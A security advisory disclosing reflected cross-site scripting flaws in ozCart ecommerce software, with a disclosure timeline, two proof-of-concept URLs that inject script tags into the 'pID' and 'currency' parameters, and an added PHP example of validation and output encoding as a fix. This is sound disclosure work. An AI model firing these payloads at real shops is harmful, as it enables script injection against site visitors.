# Ariko-Security: Security Audits, Audyt bezpieczeństwa
# Advisory: 2/2011

============ { Ariko-Security - Advisory #2/1/2011 } =============

ozCart software multiple XSS vulnerabilities

Vendor's description of software and demo:
# http://www.oscworks.com.au , http://www.ozcart.com.au/

Dork:
# N/a

Application Info:
# ozCart ecommerce software
# last v2.0

Vulnerability Info:
# Type: XSS

Time Table:
# 21/12/2010 - Vendor notified
# 06/01/2011 - Release Date. (not fixed)

XSS:
# Input passed to the "addressname" parameter in addressaction.html is not properly sanitised before being returned to the user.
# Input passed to the "pID" and "currency" parameters in addressaction.html is not properly sanitised before being returned to the user.

 

Sample POC:
# http://server/index.php?main_page=popup_image&pID=148"><sCrIpT>alert(14438)</sCrIpT>
# http://server/index.php?main_page=index.php&currency= NZD"><sCrIpT>alert(11585)</sCrIpT>&cPath=100

Solution:
# Input validation of vulnerable parameters should be corrected.
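# One way to apply this to the three parameters named above, as an added example (not ozCart code and not part of the original advisory): "pID" is validated as a positive integer, "currency" is matched against an allowlist, and the free-text "addressname" is HTML-encoded at output.
# The helper names, the currency allowlist and its default, and the echoed markup are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added example, not ozCart code. Parameter names are from the advisory;
// the currency allowlist, default and helper names are assumptions.
const ALLOWED_CURRENCIES = ['AUD', 'NZD', 'USD'];

// Encode untrusted text for an HTML body or a quoted attribute value.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// pID is a product id: accept only a positive integer, otherwise null.
function clean_pid($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $pid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $pid === false ? null : $pid;
}

// currency must exactly match an allowlisted code, otherwise use the default.
function clean_currency($raw, string $default = 'AUD'): string
{
    return (is_string($raw) && in_array($raw, ALLOWED_CURRENCIES, true)) ? $raw : $default;
}

// Constructed request values shaped like the advisory's sample input.
$query = [
    'pID'         => '148"><sCrIpT>alert(14438)</sCrIpT>',
    'currency'    => 'NZD"><sCrIpT>alert(11585)</sCrIpT>',
    'addressname' => 'Home"><sCrIpT>alert(14438)</sCrIpT>',
];

$pid         = clean_pid($query['pID'] ?? null);
$currency    = clean_currency($query['currency'] ?? null);
$addressname = is_string($query['addressname'] ?? null) ? $query['addressname'] : '';

if ($pid === null) {
    http_response_code(400);          // reject instead of reflecting the value
    echo "Invalid pID\n";
} else {
    echo 'pID=' . $pid . "\n";        // safe: $pid is an int at this point
}
// Encode at the point of output even after validation (defence in depth).
echo '<input type="hidden" name="currency" value="' . h($currency) . '">' . "\n";
echo '<span class="addressname">' . h($addressname) . "</span>\n";
```

# With the constructed input above, "pID" is rejected, "currency" falls back to the default, and "addressname" is emitted with its quotes and angle brackets encoded as entities.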

Credit:
# Discovered By: Ariko-Security 2010